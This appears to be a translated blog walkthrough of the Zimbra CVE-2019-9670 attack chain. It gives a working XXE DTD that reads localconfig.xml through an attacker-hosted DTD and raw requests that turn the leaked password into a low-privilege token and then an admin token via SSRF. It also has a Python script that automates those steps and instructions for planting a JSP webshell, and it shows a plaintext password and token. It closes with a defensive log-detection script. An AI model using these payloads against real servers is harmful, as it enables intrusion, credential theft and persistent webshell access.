Zimbra

Step one: use XXE to read the configuration file


Here the CVE-2019-9670 vulnerability is used to read the configuration file. You need to host a DTD file on your own VPS so that the Zimbra server can fetch it over HTTP (the target must therefore be able to make outbound HTTP connections to that host). For the demonstration I created a repository on GitHub and fetch the DTD file from there.

The screenshot above shows the zimbra account password highlighted with a red box; note it down, it is needed in the next step.

The DTD file reads as follows:

<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">  
<!ENTITY % start "<![CDATA["> 
<!ENTITY % end "]]>">  
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>"> 

POST request packet as follows:

POST /Autodiscover/Autodiscover.xml HTTP/1.1  
Host: mail.****.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0;) Gecko/20100101 Firefox/66.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2  
Accept-Encoding: gzip, deflate  
Referer: https://mail.****.com/zimbra/  
Content-Type: application/soap+xml  
Content-Length: 436  
Connection: close  
Cookie: ZM_TEST=true  
Upgrade-Insecure-Requests: 1  

<!DOCTYPE Autodiscover [  
        <!ENTITY % dtd SYSTEM "http://192.168.3.5/dtd">  
        %dtd;  
        %all;  
        ]>  
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">  
    <Request>  
        <EMailAddress>aaaaa</EMailAddress>  
        <AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>  
    </Request>  
</Autodiscover>  

Step two: get the low-privilege token

The screenshot shows that a token has been obtained, but this token does not carry administrator privileges, so just note it down for now. An AuthRequest in the urn:zimbraAccount namespace against /service/soap only issues an ordinary user token, even for the zimbra account; admin tokens are issued by the admin SOAP service on port 7071, which is reached in the next step.

POST request packet as follows:

POST /service/soap HTTP/1.1  
Host: mail.****.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0) Gecko/20100101 Firefox/66.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2  
Accept-Encoding: gzip, deflate  
Referer: https://mail.****.com/zimbra/  
Content-Type: application/soap+xml  
Content-Length: 467  
Connection: close  
Cookie: ZM_TEST=true  
Upgrade-Insecure-Requests: 1  

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">  
   <soap:Header>  
       <context xmlns="urn:zimbra">  
           <userAgent name="ZimbraWebClient" version="5.0.15_GA_2851"/>  
       </context>  
   </soap:Header>  
   <soap:Body>  
     <AuthRequest xmlns="urn:zimbraAccount">  
        <account by="adminName">zimbra</account>  
        <password>GzXaU76_s5</password>  
     </AuthRequest>  
   </soap:Body>  
</soap:Envelope>  

Step three: use SSRF to get an admin-privilege token

Add the low-privilege token obtained in the previous step to the cookie (as ZM_ADMIN_AUTH_TOKEN, as in the request below), change xmlns="urn:zimbraAccount" to xmlns="urn:zimbraAdmin", append ":7071" to the Host header, and make sure the target in the URL uses the https scheme. Send the request and you get an admin-privilege token: the proxy servlet accepts the low-privilege token and forwards the AuthRequest to the admin SOAP service on the loopback interface, which answers with a real admin token.

The POST request packet is as follows:

POST /service/proxy?target=https://127.0.0.1:7071/service/admin/soap HTTP/1.1  
Host: mail.****.com:7071  
User-Agent: Mozilla/5.0 (Windows NT 10.0) Gecko/20100101 Firefox/66.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2  
Accept-Encoding: gzip, deflate  
Referer: https://mail.****.com/zimbra/
Content-Type: application/soap+xml  
Content-Length: 465  
Connection: close  
Cookie: ZM_ADMIN_AUTH_TOKEN=0_5221766f264e4dcb78b4f67be5f839b1ed668da3_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313535343733303133353638333b747970653d363a7a696d6272613b7469643d393a3735353034333637323b  
Upgrade-Insecure-Requests: 1  

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">  
   <soap:Header>  
       <context xmlns="urn:zimbra">  
           <userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851"/>  
       </context>  
   </soap:Header>  
   <soap:Body>  
     <AuthRequest xmlns="urn:zimbraAdmin">  
        <account by="adminName">zimbra</account>  
        <password>GzXaU76_s5</password>  
     </AuthRequest>  
   </soap:Body>  
</soap:Envelope>  
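The three requests above can be chained in a short script. The following is an added example, not code from the original post: it builds the same DTD, Autodiscover and AuthRequest bodies shown above, parses the reflected localconfig.xml and the authToken out of the responses, and runs steps one to three through an injected transport. The host names (192.168.3.5, mail.example.com), the demo_send stand-in with its constructed responses, and the assumption that the highlighted password is the zimbra_ldap_password key of localconfig.xml are all mine, not the post's.

```python
import re
import xml.etree.ElementTree as ET
from typing import Callable, Dict, Tuple
from xml.sax.saxutils import escape

# Hypothetical hosts (assumptions, not from the post).
DTD_URL = "http://192.168.3.5/dtd"
TARGET_HOST = "mail.example.com"
PROXY_PATH = "/service/proxy?target=https://127.0.0.1:7071/service/admin/soap"
SOAP_HEADERS = {"Content-Type": "application/soap+xml"}
# send(method, path, headers, body) -> response body
Send = Callable[[str, str, Dict[str, str], str], str]


def build_dtd(path: str = "../conf/localconfig.xml") -> str:
    """External DTD served from the attacker's host (step one).  The CDATA
    wrapper stops the XML inside localconfig.xml from being parsed as markup."""
    return (
        f'<!ENTITY % file SYSTEM "file:{path}">\n'
        '<!ENTITY % start "<![CDATA[">\n'
        '<!ENTITY % end "]]>">\n'
        '<!ENTITY % all "<!ENTITY fileContents \'%start;%file;%end;\'>">\n'
    )


def build_xxe_body(dtd_url: str) -> str:
    """Autodiscover request whose DOCTYPE pulls the external DTD (step one)."""
    return (
        f'<!DOCTYPE Autodiscover [<!ENTITY % dtd SYSTEM "{dtd_url}">%dtd;%all;]>\n'
        '<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/'
        'outlook/responseschema/2006a"><Request><EMailAddress>aaaaa</EMailAddress>'
        "<AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>"
        "</Request></Autodiscover>"
    )


def extract_localconfig(response: str) -> Dict[str, str]:
    """Pull the reflected localconfig.xml out of the Autodiscover response and
    return its <key name=...><value>...</value></key> pairs."""
    m = re.search(r"<localconfig>.*?</localconfig>", response, re.S)
    if not m:
        raise ValueError("localconfig.xml not reflected in response")
    root = ET.fromstring(m.group(0))
    return {k.get("name", ""): k.findtext("value", "") for k in root.findall("key")}


def build_auth_request(user: str, password: str, ns: str = "urn:zimbraAccount") -> str:
    """AuthRequest body; urn:zimbraAccount gives the low-privilege token (step
    two), urn:zimbraAdmin is what gets sent through the proxy (step three)."""
    return (
        '<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">'
        '<soap:Header><context xmlns="urn:zimbra"><userAgent name="ZimbraWebClient" '
        'version="5.0.15_GA_2851"/></context></soap:Header>'
        f'<soap:Body><AuthRequest xmlns="{ns}"><account by="adminName">{escape(user)}'
        f"</account><password>{escape(password)}</password></AuthRequest></soap:Body>"
        "</soap:Envelope>"
    )


def parse_auth_token(soap_response: str) -> str:
    m = re.search(r"<authToken>([^<]+)</authToken>", soap_response)
    if not m:
        raise ValueError("no authToken in response (bad credentials or wrong namespace)")
    return m.group(1)


def run_chain(send: Send, host: str, dtd_url: str) -> Tuple[str, str]:
    """Steps one to three; returns (zimbra password, admin token).  Assumption:
    the password is the zimbra_ldap_password key the post's screenshot shows."""
    headers = {"Host": host, **SOAP_HEADERS}
    cfg = extract_localconfig(send("POST", "/Autodiscover/Autodiscover.xml", headers,
                                   build_xxe_body(dtd_url)))
    user, password = cfg["zimbra_user"], cfg["zimbra_ldap_password"]
    low = parse_auth_token(send("POST", "/service/soap", headers,
                                build_auth_request(user, password)))
    # The low-privilege token goes in the ZM_ADMIN_AUTH_TOKEN cookie and the
    # Host gets ":7071", exactly as in the post's step-three request.
    admin_headers = {**headers, "Host": f"{host}:7071", "Cookie": f"ZM_ADMIN_AUTH_TOKEN={low}"}
    admin = parse_auth_token(send("POST", PROXY_PATH, admin_headers,
                                  build_auth_request(user, password, "urn:zimbraAdmin")))
    return password, admin


def demo_send(method: str, path: str, headers: Dict[str, str], body: str) -> str:
    """Constructed stand-in for a vulnerable server, so the chain runs offline."""
    if path.startswith("/Autodiscover/") and "&fileContents;" in body:
        return ("<Error>Requested response schema not available <localconfig>"
                '<key name="zimbra_user"><value>zimbra</value></key>'
                '<key name="zimbra_ldap_password"><value>GzXaU76_s5</value></key>'
                "</localconfig></Error>")
    if path == "/service/soap" and 'xmlns="urn:zimbraAccount"' in body:
        return "<AuthResponse><authToken>LOWPRIV</authToken></AuthResponse>"
    if (path == PROXY_PATH and headers.get("Cookie") == "ZM_ADMIN_AUTH_TOKEN=LOWPRIV"
            and 'xmlns="urn:zimbraAdmin"' in body):
        return "<AuthResponse><authToken>ADMINTOK</authToken></AuthResponse>"
    return "<Fault/>"


if __name__ == "__main__":
    print(run_chain(demo_send, TARGET_HOST, DTD_URL))
```

Against a real lab target, replace demo_send with a function that sends the request over HTTPS (for example with http.client.HTTPSConnection, passing the headers dict through unchanged so the Host override for port 7071 survives) and returns the response body as text; build_dtd() gives the file to put on the DTD host. The password is XML-escaped before it is placed in the AuthRequest so that a value containing & or < does not break the envelope.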

Step four: upload a webshell

Add the admin-privilege token obtained in the previous step to the cookie, then upload the webshell.

The webshell path is /downloads/k4x6p.jsp; the admin token must be included in the cookie when accessing the webshell.

You can use this small shell to drop a China Chopper-compatible webshell into another directory that can be accessed without the cookie.
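Every hop of this chain is visible at the web tier: an inline DTD posted to an XML endpoint, the proxy servlet pointed at loopback or port 7071, and a JSP served out of /downloads/. The following detection pass is an added example, not part of the original post; the request records are constructed samples, and the field names (method, path, body) are an assumption about what a WAF or reverse-proxy log exports.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Constructed request records (assumption: the log gives method, request path
# with query string, and POST body).  Hosts and token values are made up.
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/Autodiscover/Autodiscover.xml",
     "body": '<!DOCTYPE Autodiscover [<!ENTITY % dtd SYSTEM "http://192.168.3.5/dtd">'
             "%dtd;%all;]><Autodiscover><Request><AcceptableResponseSchema>"
             "&fileContents;</AcceptableResponseSchema></Request></Autodiscover>"},
    {"method": "POST", "path": "/Autodiscover/Autodiscover.xml",
     "body": '<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/'
             'outlook/requestschema/2006"><Request><EMailAddress>bob@example.com'
             "</EMailAddress></Request></Autodiscover>"},
    {"method": "POST", "path": "/service/proxy?target=https://127.0.0.1:7071/service/admin/soap",
     "body": "<soap:Envelope/>"},
    {"method": "GET", "path": "/downloads/k4x6p.jsp", "body": ""},
    {"method": "POST", "path": "/service/soap",
     "body": '<soap:Envelope><AuthRequest xmlns="urn:zimbraAccount"/></soap:Envelope>'},
]

DTD_DECL = re.compile(r"<!(?:DOCTYPE|ENTITY)\b", re.I)
LOOPBACK = {"127.0.0.1", "localhost", "::1", "0.0.0.0"}
ADMIN_PORT = 7071


def classify(req: Dict[str, str]) -> List[str]:
    """Return the indicators this one request matches (empty list = clean)."""
    url = urlsplit(req["path"])
    findings = []
    # Neither Outlook Autodiscover nor the Zimbra web client sends an inline
    # DTD; a DOCTYPE/ENTITY declaration in a request body is an XXE attempt.
    if DTD_DECL.search(req.get("body", "")):
        findings.append(f"xxe: DTD/entity declaration posted to {url.path}")
    # The proxy servlet aimed at loopback, the admin port or the admin SOAP
    # path is the SSRF hop of step three.
    if url.path == "/service/proxy":
        for target in parse_qs(url.query).get("target", []):
            t = urlsplit(target)
            if (t.hostname in LOOPBACK or t.port == ADMIN_PORT
                    or t.path.startswith("/service/admin")):
                findings.append(f"ssrf: proxy target reaches admin service ({target})")
    # /downloads/ holds static client installers; a JSP there is a dropped shell.
    if url.path.startswith("/downloads/") and url.path.lower().endswith(".jsp"):
        findings.append(f"webshell: JSP served from {url.path}")
    return findings


def scan(requests: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map request index -> findings for every request that triggered something."""
    hits = {}
    for i, req in enumerate(requests):
        found = classify(req)
        if found:
            hits[i] = found
    return hits


if __name__ == "__main__":
    for i, found in scan(SAMPLE_REQUESTS).items():
        print(i, SAMPLE_REQUESTS[i]["method"], SAMPLE_REQUESTS[i]["path"], found)
```

Of the five samples, the XXE Autodiscover post, the proxy request to 127.0.0.1:7071 and the JSP under /downloads/ are flagged; the ordinary Autodiscover lookup and the normal AuthRequest are not. The ssrf rule also matches hostnames such as localhost and any target whose path starts with /service/admin, so rewriting the loopback address does not evade it.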

I mainly did some tidying-up work here; thanks to the experts who wrote the analysis articles online.

Reference links:

https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html

https://blog.csdn.net/fnmsd/article/details/88657083

http://www.cnvd.org.cn/flaw/show/CNVD-2019-07448

http://www.cnvd.org.cn/flaw/download?cd=20f07bbf4fc4769b606a52a0d14f79dd


Origin www.cnblogs.com/davinc1/p/10967115.html